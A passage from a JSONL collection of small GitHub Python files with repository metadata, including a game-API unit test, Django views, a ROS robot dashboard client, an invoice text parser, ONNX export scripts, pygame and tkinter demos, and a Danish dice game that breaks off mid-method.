[], \"4\": [], \"5\": []})\n\n        with requests_mock.mock() as mock:\n            mock.register_uri(\n                \"POST\", \"https://com1.kingdoms.com/api/\", json={\"mock\": \"mocked\"}\n            )\n            r = bq.finishNow(2)\n            self.assertEqual(r, {\"mock\": \"mocked\"})\n\n    def testing_construction_list(self):\n        with open(\"./tests/unit/fixtures/pickled_driver.py\", \"rb\") as f:\n            g = pickle.load(f)\n\n        with open(\"./tests/unit/fixtures/construction_list_raw.json\", \"r\") as f:\n            construction_list_raw = json.load(f)\n\n        with requests_mock.mock() as mock:\n            mock.register_uri(\n                \"POST\", \"https://com1.kingdoms.com/api/\", json=construction_list_raw\n            )\n            c = ConstructionList(g, 536461288, \"39\")\n            c.pull()\n            self.assertEqual(len(c.buildable), 4)\n            self.assertEqual(len(c.notBuildable), 8)\n            with self.assertRaises(KeyError):\n                c[BuildingType.CRANNY]\n            self.assertFalse(c[BuildingType.IRON_FOUNDRY][\"buildable\"])\n            self.assertTrue(c[BuildingType.SMITHY][\"buildable\"])\n            with self.assertRaises(KeyError):\n                c[BuildingType.SMITHY][\"keyError\"]\n\n        with self.assertRaises(TypeError):\n            c[\"NotABuildingType\"]\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"didadadida93/tkpy","sub_path":"tests/unit/test_buildings.py","file_name":"test_buildings.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"41502733902","text":"import turtle\r\n\r\nn = int(input(\"Enter a number \"))\r\n\r\ncolor = 0\r\nw = turtle.Screen()\r\nw.bgcolor(\"lightgreen\")\r\nheight = w.window_height() # height\r\nwidth = w.window_width() # width\r\n\r\nalex = turtle.Turtle()\r\nalex.shape(\"turtle\")\r\n# alex.color(\"white\")\r\nalex.speed(0)\r\nalex.penup()\r\nalex.setpos(-199, +199)\r\nalex.setpos(-width//2+20, +height//2-20)\r\nalex.right(90)\r\n\r\nwhile n>0:\r\n    if color % 3 == 0 :\r\n        alex.color(\"red\")\r\n    elif (color-1) % 3 == 0: \r\n        alex.color(\"green\")\r\n    else: \r\n        alex.color(\"blue\")\r\n    alex.pendown()\r\n    alex.forward(height-50)\r\n    alex.penup()\r\n    alex.left(90)\r\n    alex.forward(20)\r\n    alex.left(90) \r\n    alex.forward(height-50)\r\n    alex.left(180)\r\n    color += 1\r\n    n -= 1\r\n\r\n\r\nw.mainloop()","repo_name":"DegtyarevaAS/TURTLE","sub_path":"ch2.py","file_name":"ch2.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33563516257","text":"# Create a Product class with 3 attributes\n#SENSEI BONUS: Update the product class to give each product a unique id. Update the sell_product method to accept the unique id.\nclass Product:\n    def __init__(self, name, price, category, id):\n        self.name = name\n        self.price = price\n        self.category = category\n        self.id = id\n# Add the update_price method to the Product class\n    def update_price(self, percent_change, is_increased):\n        if is_increased == True:\n            x = self.price + (self.price * percent_change)\n            self.price = round(x, 2)\n            self.print_info()\n            return self\n        else: \n            x = self.price - (self.price * percent_change)\n            self.price = round(x, 2)\n            self.print_info()\n            return self\n# Add the print_info method to the Product class\n    def print_info(self):\n        print(f'Current price for {self.name} {self.category} are ${self.price}!')\n        return self","repo_name":"c-osornio/python_stack","sub_path":"fundamentals/extras/Store&Products/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"16530032756","text":"from django.shortcuts import render, HttpResponse,redirect\nfrom home.models import About\nfrom datetime import datetime\nfrom django.contrib import messages\nfrom django.views import View\n\n# Create your views here.\n\ncontext = {\n    \"Author\": \"Jawad Ahmed\"\n}\n\n\ndef index(request):\n    return render(request, 'index.html', {\"Author\":context})\n    # return HttpResponse(f\"Home Page {id}\")\n\n\nclass AboutClass(View):\n    def get(self, request):\n        return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n\n    def post(self, request):\n        print(\"request.POST\",request.POST.get('id'))\n        # return HttpResponse(\"ok\")\n        if request.POST.get('id',False):\n            about = About.objects.filter(id = request.POST.get('id')).first()\n            if about:\n                # return HttpResponse(about.id)\n                about.name = request.POST.get('name')\n                about.email = request.POST.get('email')\n                about.phone = request.POST.get('phone')\n                about.desc = request.POST.get('desc')\n                about.save()\n                return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n            else:\n                messages.error(request, 'Data Not Found')\n                return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n        \n        else:\n            about = About(name=request.POST.get('name'), email=request.POST.get('email'), phone=request.POST.get('phone'), desc=request.POST.get('desc'), date=datetime.today())\n            about.save()\n            messages.success(request, 'Data Added Successfully')\n            return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n            # return redirect('/about')\n\n    def delete(self, request, id):\n        record = About.objects.get(id = id)\n        record.delete()\n        return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n    \ndef contact(request, id):\n    return HttpResponse(f\"Contact Page {id}\")\n","repo_name":"jawad224/djangoPractice","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13757328714","text":"from 
rest_framework.serializers import ModelSerializer\nfrom bookapp.models import Books\nfrom rest_framework import serializers\n\nclass BookSerializer(ModelSerializer):\n    # user=serializers.CharField(read_only=True)\n\n    class Meta:\n        model=Books\n        fields=\"__all__\"\n\n    def create(self, validated_data):\n        # user=self.context.get(\"user\")\n        book_name=self.context.get(\"book_name\")\n        return Books.objects.create(**validated_data,book_name=book_name)","repo_name":"abhisharaveendran9/bookstore","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17794432358","text":"import sys, os\nsys.path.append(os.path.abspath(\"..\"))\nfrom aoc21 import aoc\n\ndef get_neighbours(x, y, max_x, max_y):\n    neighbours = []\n\n    if x != 0:\n        neighbours.append((x-1, y))\n    if x != max_x - 1:\n        neighbours.append((x+1, y))\n    if y != 0:\n        neighbours.append((x, y-1))\n    if y != max_y - 1:\n        neighbours.append((x, y+1))\n    \n    return neighbours\n\n\ninput = aoc.aoc()\n\nmax_y = len(input)\nmax_x = len(input[0])\n\nvar_input = [[0 for _ in range(max_x)] for _ in range(max_y)]\n\nfor x in range(max_x):\n    for y in range(max_y):\n        var_input[y][x] = int(input[y][x])\n\ninput = var_input\n\nminima = []\n\nfor y in range(max_y):\n    row = input[y]\n    for x in range(max_x):\n        value = row[x]\n        lower_neighbours = list(filter(lambda pos: input[pos[1]][pos[0]] <= value, get_neighbours(x, y, len(row), len(input))))\n        \n        if len(lower_neighbours) == 0:\n            minima.append((x, y))\n\nbasins = []\n\nfor minimum in minima:\n\n\n    value = input[minimum[1]][minimum[0]]\n    to_explore = list(filter(lambda pos: input[pos[1]][pos[0]] > value and input[pos[1]][pos[0]] != 9, get_neighbours(minimum[0], minimum[1], max_x, max_y)))\n\n    explored = [minimum]\n\n    while len(to_explore) > 0:\n        exploring = to_explore.pop(0)\n        val = input[exploring[1]][exploring[0]]\n        explored.append(exploring)\n        if val == 9:\n            continue\n        to_explore += list(filter(lambda pos: input[pos[1]][pos[0]] > val and pos not in explored and pos not in to_explore and input[pos[1]][pos[0]] != 9, get_neighbours(exploring[0], exploring[1], max_x, max_y)))\n\n    basins.append(len(explored))\n\n\nbasins.sort()\nmax_basins = (basins[-3:])\n\nmult = 1\n\nfor b in max_basins:\n    mult *= b\n\nprint(f\"The multiplied basin area is {mult}\")\n","repo_name":"Smephite/aoc2021","sub_path":"day09/day09_2.py","file_name":"day09_2.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37342764446","text":"'''This program is used to connect to the Dashboard services for the provided message type, either from the std_srvs.srv (Trigger) or from the ur_dashboard_msgs.srv (UR Dashboard)\n\nThe dashboard commands are on the ROS service and can be activated through connecting to the corresponding service\n\nFor more details on which service is being used here, see: https://github.com/UniversalRobots/Universal_Robots_ROS_Driver/blob/master/ur_robot_driver/doc/ROS_INTERFACE.md\n\nMsg_name examples: Load, Popup, IsInRemoteControl, Trigger\n\nPerform timeout check from the Timer.py to identify whether the client is successfully connected to the service\n- if the timeout has been reached and the service is not connected, output the result. The std_srvs.srv Trigger returns 2 outputs (http://docs.ros.org/api/std_srvs/html/srv/Trigger.html)\nthese can be directly accessed through the request result\ne.g. \n\nclient = rospy.ServiceProxy('power on', Trigger)\nrequest = TriggerRequest()\nresult = client(request)\n\nprint(result.answer)\nprint(result.success)\n\nservice_name is the pre-defined service name that is called upon the instantiation of the program\nhttp://docs.ros.org/api/std_srvs/html/srv/Trigger.html \nhttps://github.com/UniversalRobots/Universal_Robots_ROS_Driver/blob/master/ur_robot_driver/doc/ROS_INTERFACE.md\nhttps://github.com/UniversalRobots/Universal_Robots_ROS_Driver/tree/98e0d87234cdbd75736c0a30b817cd4ec34bc469/ur_dashboard_msgs \n\n'''#!/usr/bin/env python\n\n# import all the relevant libraries and service messages that are needed to obtain the dashboard result\nimport rospy\nfrom ur_dashboard_msgs.srv import Load, LoadRequest, Popup, PopupRequest, IsInRemoteControl,IsInRemoteControlRequest, GetRobotMode, GetRobotModeRequest\nfrom std_srvs.srv import Trigger, TriggerRequest\nimport time\nfrom Timer import Time_Out_Check\n\nclass Dashboard_Client:\n    def __init__(self, service_str_name, Msg_Name, Msg_Request):\n        self.service_general_name = '/ur_hardware_interface/dashboard/'\n        self.time_out_check = Time_Out_Check()\n        self.Msg_Name = Msg_Name\n        self.Msg_Request = Msg_Request\n        self.service_str_name = service_str_name\n        self.service_name = self.service_general_name+self.service_str_name\n    def tout(self, result):\n        return self.time_out_check.time_out(result, Msg_Request_Name=self.Msg_Request)\n    \n    def connect(self):\n        rospy.wait_for_service(self.service_name)\n        client =rospy.ServiceProxy(self.service_name, self.Msg_Name)\n        request = self.Msg_Request\n        # request = TriggerRequest()\n        result = client(request) \n        # self.tout(result)\n        print(result)\n        self.time_out_check.time_out(result,self.Msg_Request)\n        return result\n\n    def load(self, file_name):\n        service_name = '/ur_hardware_interface/dashboard/load_program'\n        # rospy.init_node('Dashboard_load_program')\n        rospy.wait_for_service(service_name)\n        client =rospy.ServiceProxy(service_name, Load)\n        request = LoadRequest()\n        request.filename = file_name+'.urp'\n        print('loading program:',request.filename)\n        result = client(request)\n        # self.time_out_check.time_out(result, Msg_Request_Name=self.Msg_Request)\n        self.tout(result)\n        # print(result.success)\n        return result\n    \n    def robot_mode(self):\n        service_name = self.service_general_name+'get_robot_mode'\n        \n        rospy.wait_for_service(service_name, timeout=3)\n        # req = ur_dashboard_msgs.msg.RobotMode()\n        # print(req.answer)\n        # print(m)\n        client = rospy.ServiceProxy(service_name,GetRobotMode)\n        request = GetRobotModeRequest()\n        result = client(request)\n        # self.tout(result)\n        print('==========')\n        print(result)\n        \n        return result.answer\n    \n    def play(self):\n        status = {#'Robotmode: ':'NO_CONTROLLER'\n                # ,'Robotmode: ':'DISCONNECTED'\n                # ,'Robotmode: ':'CONFIRM_SAFETY'\n                # ,'Robotmode: ':'BOOTING',\n                'OFF':'Robotmode: POWER_OFF',\n                'ON':'Robotmode: POWER_ON',\n                'RUNNING':'Robotmode: RUNNING'\n                }\n        robot_status_check = self.robot_mode()\n        print('===========')\n        # print(status['RUNNING'])\n        while robot_status_check != status['RUNNING']:\n            robot_status_check = self.robot_mode()\n            time.sleep(1)\n            print('The current mode is in: {}'.format(robot_status_check))\n        \n        rospy.loginfo('Starting program!')\n        print('starting program!!')\n        self.connect()\n\n        \n        # print('uuuu')\n        # else:\n        #     print('It is taking its damn time to connect to the 
robot, so waitttt')\n \n # raise SystemError('Check if the robot is powered on/ in remote control!')\n # self.time_out_check.time_out(result,self.Msg_Request)\n\n\n \n# is_remote_check = Dashboard_Service('is_in_remote_control', IsInRemoteControl, IsInRemoteControlRequest())\n# is_remote_check.load()\n\n# power_on =Dashboard_Client('power_on', Trigger, TriggerRequest())\n# power_on.connect()\n# brake_release =Dashboard_Client('brake_release', Trigger, TriggerRequest())\n# brake_release.connect()\n\n\n# program_name = {'external':'external_control', 'pcb_pick_and_place':'pcb', 'test':'testing'}\n# load_program = Dashboard_Client('load_program', Load, LoadRequest())\n# load_program.load(file_name = program_name['external'])\n\n# play = Dashboard_Client('play', Trigger, TriggerRequest())\n# play.play()\n# # play.connect()\n\n\n# time.sleep(5) \n# spause = Dashboard_Client('pause', Trigger, TriggerRequest()) \n\n# # pause.connect()\n\n# stop =Dashboard_Client('stop', Trigger, TriggerRequest())\n# stop.connect()\n","repo_name":"evacheung0929/UR5e_Simulation_And_Dual_Arm_Control","sub_path":"Universal_Robots_ROS_Driver/ur_robot_driver/scripts/single_robot/wait_4_service.py","file_name":"wait_4_service.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"43299869037","text":"from tkinter import *\r\nroot=Tk()\r\nroot.title(\"form\")\r\nroot.geometry(\"500x500+0+0\")\r\ndef show_text():\r\n if checkvar.get()==1:\r\n result1 = \"Name : \"+ text_field.get('1.0',END) +\"Gender : \"+ gendervar.get()\r\n result.config(text=str(result1))\r\n else:\r\n result.config(text=\"Accept\")\r\n\r\n\r\n \r\n\r\n\r\ntext_field=Text(root)\r\nname=Label(root,text=\"Enter Name\",font=(\"times new roman\",20,\"bold\"),fg=\"blue\").place(x=30,y=55)\r\ntext_field.place(x=250,y=50,width=200,height=50)\r\n\r\n\r\ngendervar=StringVar()\r\ngender=Label(root,text=\"Select Gender\",font=(\"times new roman\",20,\"bold\"),fg=\"blue\").place(x=30,y=205)\r\nradiob1=Radiobutton(root,font=(\"times new roman\",20,\"bold\"),value=\"Female\",variable=gendervar).place(x=250,y=200)\r\nl1=Label(root,text=\"F\").place(x=252,y=230)\r\nradiob2=Radiobutton(root,font=(\"times new roman\",20,\"bold\"),value=\"Male\",variable=gendervar).place(x=300,y=200)\r\nl2=Label(root,text=\"M\").place(x=302,y=230)\r\nradiob3=Radiobutton(root,font=(\"times new roman\",20,\"bold\"),value=\"Transgender\",variable=gendervar).place(x=350,y=200)\r\nl3=Label(root,text=\"T\").place(x=352,y=230)\r\ngendervar.set(\"Female\")\r\n\r\n\r\ncheckvar=IntVar()\r\ncheckb=Checkbutton(root,text=\"Accept\",font=(\"times new roman\",15,\"bold\"),onvalue=1,offvalue=0,variable=checkvar).place(x=250,y=300)\r\ncheckvar.set(1)\r\nresult=Label(root,text=\"\")\r\nresult.place(x=0,y=350,relwidth=1)\r\nbut=Button(root,text=\"Show\",padx=40,pady=10,bg=\"pink\",fg=\"blue\",activebackground=\"pink\",activeforeground=\"white\",cursor=\"hand2\",command=show_text).place(x=200,y=450)\r\nroot.mainloop()\r\n","repo_name":"PRACHIBHAVSAR/Python-Tkinter","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7565798753","text":"import numpy as np \nimport fitz\nimport re\n\ndef ola_bill(a):\n\n index_name=0\n index_mob=0\n index_date=0\n index_sid=0\n\n for i,jj in enumerate(a):\n xx = jj.split()\n if [w for w in xx if 
re.search('(Name|Name(s)|given|name|names|Names)$', w)]:\n index_name=i\n x=re.split(\"Customer Name\",a[i])\n name=x[1]\n print(\"the travelled person name is \",name)\n for i,jj in enumerate(a):\n xx = jj.split()\n if [w for w in xx if re.search('(Mobile|Number)$', w)]:\n index_mob=i\n y=re.split(\"Mobile Number\",a[i])\n\n mob=y[1]\n print(\"the travelled person mobile number is \",mob)\n for i,jj in enumerate(a):\n xx = jj.split()\n if [w for w in xx if re.search('(Date|date)$', w)]:\n index_date=i\n z=re.split(\"Invoice Date\",a[i])\n\n date=z[1]\n print(\"the date of travel is \",date)\n # Invoice Serial Id:DVDJEKW200769\n list1=[]\n list2=[]\n for i,jj in enumerate(a):\n sno=re.findall(\"[A-Z]{7}\\d{6}\",jj)\n if sno!=[\" \"] and len(sno)==1:\n list1.append(sno) \n serial_id=list1[0][0]\n for i,jj in enumerate(a):\n xx = jj.split()\n if jj==\"Total Bill (rounded off)\":\n index_date=i\n totalfare=a[i+2]\n print(\"Total Fare for the trip is \" ,totalfare)\n # serial_id=z[1]\n print(\"the invoice serial id of travel is \",serial_id)\n for i,jj in enumerate(a):\n xx=jj.split()\n time=re.findall(\"\\d{2}:\\d{2}\\s[A-Z]{2}\",jj)\n if time!=[\" \"] and len(time)==1:\n list2.append(time) \n time1=list2[0][0]\n time2=list2[1][0]\n # print(time1,time2)\n index_time=0\n b=[]\n for i,jj in enumerate(a):\n xx = jj.split()\n if(jj==time1):\n b.append(i)\n if(jj==time2):\n temp=i\n # print(temp)\n break\n temp1=b[0]\n print(\"the pickup address is \")\n for i in range(temp1,temp-1,1):\n print(a[i+1])\n c=[]\n for i,jj in enumerate(a):\n xx = jj.split()\n if(jj==time2):\n c.append(i)\n if(jj==\"Ride Fare\"):\n temp=i\n # print(temp)\n break\n # print(temp)\n temp2=c[0]\n print(\"the Drop address is \")\n for i in range(temp2,temp-1,1):\n print(a[i+1])\n\nfile = '/home/ananthu/projects/invoice_extraction/data/ola_bill1.pdf'\ndoc = fitz.open(file)\npage_count = doc.pageCount\n#print(page_count)\npage =0 \n\ntext = str()\nwhile( page < page_count):\n p = doc.loadPage(page)\n page += 1\n text = text + p.getText()\n#print(text)\na=[]\nlines1 = text.split('\\n')\nfor lin in lines1:\n s = lin.strip()\n s = s.rstrip()\n s = s.lstrip()\n a.append(s)\n#print(a)\nola_bill(a)\n\n","repo_name":"ananthu10-ai/machine_learning","sub_path":"invoice_extraction/ocr_bill.py","file_name":"ocr_bill.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8494319438","text":"#! 
/usr/bin/env python\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport onnx\nfrom onnxsim import simplify\nimport numpy as np\nnp.random.seed(0)\n\n\nclass pseudo_GroupNorm(nn.Module):\n def __init__(self, num_features, num_groups=3, eps=1e-5):\n super(pseudo_GroupNorm, self).__init__()\n self.weight = nn.Parameter(torch.ones(1,num_features,1,1))\n self.bias = nn.Parameter(torch.zeros(1,num_features,1,1))\n self.num_groups = num_groups\n self.eps = eps\n\n def forward(self, x):\n N,C,H,W = x.size()\n G = self.num_groups\n assert C % G == 0\n\n x = x.view(N,G,-1)\n mean = x.mean(-1, keepdim=True)\n var = x.var(-1, keepdim=True)\n\n x = (x-mean) / (var+self.eps).sqrt()\n x = x.view(N,C,H,W)\n return x * self.weight + self.bias\n\n\nclass Model(nn.Module):\n def __init__(\n self,\n ):\n super(Model, self).__init__()\n self.gn = nn.GroupNorm(3, 6)\n\n def forward(self, x):\n return self.gn(x)\n\n\nif __name__ == \"__main__\":\n OPSET=11\n MODEL = f'GroupNormalization'\n model = Model()\n onnx_file = f\"{MODEL}_{OPSET}.onnx\"\n x = torch.randn(20, 6, 10, 10)\n torch.onnx.export(\n model,\n args=(x),\n f=onnx_file,\n opset_version=OPSET,\n input_names=[\n f'{MODEL}_input',\n ],\n output_names=[\n f'{MODEL}_output',\n ],\n do_constant_folding=False,\n )\n model_onnx1 = onnx.load(onnx_file)\n model_onnx1 = onnx.shape_inference.infer_shapes(model_onnx1)\n onnx.save(model_onnx1, onnx_file)\n model_onnx2 = onnx.load(onnx_file)\n model_simp, check = simplify(model_onnx2)\n onnx.save(model_simp, onnx_file)\n\n OPSET=18\n MODEL = f'GroupNormalization'\n model = Model()\n onnx_file = f\"{MODEL}_{OPSET}.onnx\"\n x = torch.randn(20, 6, 10, 10)\n torch.onnx.export(\n model,\n args=(x),\n f=onnx_file,\n opset_version=OPSET,\n input_names=[\n f'{MODEL}_input',\n ],\n output_names=[\n f'{MODEL}_output',\n ],\n do_constant_folding=False,\n )\n model_onnx1 = onnx.load(onnx_file)\n model_onnx1 = onnx.shape_inference.infer_shapes(model_onnx1)\n onnx.save(model_onnx1, onnx_file)\n model_onnx2 = onnx.load(onnx_file)\n model_simp, check = simplify(model_onnx2)\n onnx.save(model_simp, onnx_file)","repo_name":"PINTO0309/onnx2tf","sub_path":"make_test_op/make_GroupNormalization.py","file_name":"make_GroupNormalization.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":410,"dataset":"github-code","pt":"61"} +{"seq_id":"40104894238","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom main.models import Task, Progress\n\n# Create your views here.\ndef index(request):\n tasks = Task.objects.all()\n context = { 'tasks' : tasks }\n return render(request, 'main/index.html', context)\n\ndef addTask(request):\n name = request.GET['taskname']\n desc = request.GET['taskdesc']\n freq = request.GET['taskfreq']\n task = Task(name=name, description=desc, weeklyfreq=int(freq))\n task.save()\n return HttpResponse(status=200)\n\ndef deleteTask(request):\n name = request.GET['taskname']\n task = Task.objects.get(name=name)\n Progress.objects.filter(task=task).delete()\n task.delete()\n return HttpResponse(status=200)\n\ndef resetProgress(request):\n name = request.GET['taskname']\n task = Task.objects.get(name=name)\n prog = [p for p in Progress.objects.filter(task=task) if p.done_this_week()]\n for p in prog:\n p.delete()\n return HttpResponse(status=200)\n\ndef incProgress(request):\n name = request.GET['taskname']\n task = Task.objects.get(name=name)\n prog = Progress(task=task)\n prog.save()\n return 
HttpResponse(status=200)\n\ndef semantic_index(request):\n return render(request, 'main/index-semantic.html')\n\ndef servePartial(request, partialname):\n return render(request, 'main/partials/' + partialname + '.html')\n","repo_name":"agentreno/tasktracker","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3613704487","text":"import pygame, sys\r\npygame.init()\r\n\r\n# screen\r\nBLOCK = 15\r\nSPEED = 15\r\nWIDTH = 500\r\n\r\n\r\n# colors\r\nCOLOR_BLACK = (0, 0, 0)\r\nCOLOR_BLUE = (0, 0, 255)\r\nCOLOR_WHITE = (255, 255, 255)\r\n\r\n#background image\r\nmain_menu = pygame.image.load(\"assets/snake_menu.jpg\")\r\n#background1 = pygame.image.load(\"startscreen.png\")\r\npause_menu_image = pygame.image.load(\"assets/pause.jpg\")\r\ncredits_menu_image = pygame.image.load(\"assets/credits_snakev2.jpg\")\r\n\r\n\r\nclick = False\r\n\r\n\r\nwindow = pygame.display.set_mode((WIDTH, WIDTH))\r\npygame.display.set_caption(\"Snake\")\r\n\r\ngame_clock = pygame.time.Clock()\r\ngame_over = False\r\npause_menu = False\r\ncredits_menu = False\r\nmenu = True\r\n\r\nFONT = pygame.font.Font(\"assets/PressStart2P.ttf\", 24)\r\n\r\n#font = pygame.font.SysFont(None, 20)\r\n\r\n\r\n#def draw_text(text, font, color, surface, x, y):\r\n # textobj = font.render(text, 1, color)\r\n # textrect = textobj.get_rect()\r\n # textrect.topleft = (x, y)\r\n # surface.blit(textobj, textrect)\r\n\r\n\r\ndef run_menu():\r\n global menu\r\n while menu:\r\n window.fill((0, 0, 0, 0))\r\n window.blit(main_menu, (0, 0))\r\n\r\n start_button = pygame.Rect(50, 200, 200, 50)\r\n credits_button = pygame.Rect(50, 300, 200, 50)\r\n pygame.image.load(\"assets/Start.png\")\r\n pygame.image.load(\"assets/credits.png\")\r\n\r\n start_message = FONT.render(\"Start\", 1, COLOR_WHITE)\r\n window.blit(start_message, (50, 200))\r\n\r\n\r\n credits_option = FONT.render(\"Credits\", 1, COLOR_WHITE)\r\n window.blit(credits_option, (50, 300))\r\n\r\n #draw_text('main menu', font, (255, 255, 255), window, 20, 20)\r\n\r\n #pygame.draw.rect(window, (255, 0, 0), start_button)\r\n #pygame.draw.rect(window, (0, 0, 255), credits_button)\r\n\r\n mx, my = pygame.mouse.get_pos()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n if start_button.collidepoint((mx, my)):\r\n menu = False\r\n elif credits_button.collidepoint((mx, my)):\r\n credits()\r\n\r\n\r\n\r\n\r\n game_clock.tick(SPEED)\r\n pygame.display.update()\r\n\r\n\r\n\r\ndef pause():\r\n pause_menu = True\r\n while pause_menu:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n pause_menu = False\r\n\r\n window.fill((0, 0, 0, 0))\r\n game_clock.tick(SPEED)\r\n window.blit(pause_menu_image, (0, 0))\r\n\r\n pause_message = FONT.render(\"Click to return\", 1, COLOR_WHITE)\r\n window.blit(pause_message, (50, 300))\r\n\r\n pygame.display.update()\r\n\r\ndef credits():\r\n credits_menu = True\r\n while credits_menu:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n credits_menu = False\r\n\r\n window.fill((0, 0, 0, 0))\r\n game_clock.tick(SPEED)\r\n window.blit(credits_menu_image, (0, 0))\r\n\r\n 
pygame.display.update()\r\n\r\n","repo_name":"ghffadel/Snake","sub_path":"menuv1.py","file_name":"menuv1.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9104489445","text":"import random\n\nclass Terning():\n\n    def __init__(self, antalSider=6):\n        self.sider = antalSider\n        self.rul()\n\n    def rul(self):\n        self.slaget = random.randint(1, self.sider)\n        return self.slaget\n\nclass Raflebaeger():\n\n    def __init__(self):\n        self.terninger = []\n\n    def add(self, terningen):\n        self.terninger.append(terningen)\n\n    def remove(self, terningen):\n        self.terninger.remove(terningen)\n\n    def roll(self):\n        for terning in self.terninger:\n            terning.rul()\n\n    def showResults(self):\n        out = ''\n        for terning in self.terninger:\n            out += 'd{}: {}\\n'.format(terning.sider, terning.slaget)\n        return out\n\nclass SpillerController():\n    \"\"\"\n    This class controls the data and actions for the players in the game 1-100.\n    \"\"\"\n    def __init__(self, navn='Rudolf'):\n        \"\"\"\n        Initializes instance variables, including the player's name, which defaults\n        to 'Rudolf' if nothing else is given as a parameter.\n        \"\"\"\n        self.baeger = Raflebaeger()\n        self.baeger.add(Terning(6))\n        self.points = 0\n        self.turPoints = 0\n        self.navn = navn\n\n    def rul(self):\n        \"\"\"\n        The method rolls the dice cup and adds the result to the player's points\n        for this turn. If the player rolls a 1 with a die, the points for the turn are reset.\n        \"\"\"\n        self.baeger.roll()\n        for terning in self.baeger.terninger:\n            if terning.slaget == 1:\n                self.turPoints = 0\n            else:\n                self.turPoints += terning.slaget\n\n    def stop(self):\n        \"\"\"\n        The method adds the points earned in the active turn to the total score\n        and resets the counter for points in the active turn.\n        \"\"\"\n        self.points += self.turPoints\n        self.turPoints = 0\n\nclass SpilController():\n    \"\"\"\n    This class controls the data and flow of a game of 1-100.\n    The parameter 'spillere' is a list of strings representing the players' names.\n    If nothing else is given, the game is created with the players 'Spiller 1'\n    and 'Spiller 2'.\n    The parameter 'target' is the point goal for the players. If nothing else is given,\n    this is 100.\n    \"\"\"\n\n    def __init__(self, spillere=['Spiller 1', 'Spiller 2'], target=100):\n        \"\"\"\n        Initializes instance variables. The method ensures that there is at least one player\n        and sets the active player to the first one in the list.\n        \"\"\"\n        self.spillere = []\n        if len(spillere) < 1:\n            self.spillere.append(SpillerController('Solospiller'))\n        else:\n            for navn in spillere:\n                self.spillere.append(SpillerController(navn))\n        self.aktivSpiller = self.spillere[0]\n        self.vinder = None\n        self.ture = 1\n        self.target = target\n\n    def skiftSpiller(self):\n        \"\"\"\n        Switches the active player to the next one in line, or to the first one\n        if the end of the line has been reached.\n        \"\"\"\n        self.ture += 1\n        aktivIndex = self.spillere.index(self.aktivSpiller)\n        if aktivIndex == len(self.spillere)-1:\n            self.aktivSpiller = self.spillere[0]\n        else:\n            self.aktivSpiller = self.spillere[aktivIndex+1]\n\n    def checkForSejr(self):\n        \"\"\"\n        Checks whether a winner of the game can be declared. The following conditions\n        must be met:\n        - At least one player must have reached the point goal\n        - All players must have had the same number of turns\n        - At most one player has the highest number of points\n        \"\"\"\n        maxPoints = 0\n        uafgjort = False\n        potentielVinder = None\n        for spiller in self.spillere:\n            if spiller.points > maxPoints:\n                potentielVinder = spiller\n                maxPoints = spiller.points\n                uafgjort = False\n            elif spiller.points == maxPoints:\n                uafgjort = True\n        if not uafgjort and potentielVinder.points >= self.target and self.ture % len(self.spillere) == 0 and self.ture > 0:\n            self.vinder = potentielVinder\n\n\n    def spil(self, valg):\n        \"\"\"\n        Receives the player's action ('rul' or 'stop') and plays out the player's\n        turn according to the rules of the game.\n        The method has different return values depending on the result of the player's\n        action and the outcome of the dice:\n        - 'død': The player has rolled a 1, and the turn passes to the next player\n        - 'fortsæt': The player may continue\n        - 'stop': The player ends their turn, adds the earned points to\n        the total, and the turn passes to the next player\n        \"\"\"\n        if valg == 'rul':\n            self.aktivSpiller.rul()\n            if self.aktivSpiller.turPoints == 0:\n                self.skiftSpiller()\n                return 'død'\n            return 'fortsæt'\n        elif valg == 'stop':\n            self.aktivSpiller.stop()\n            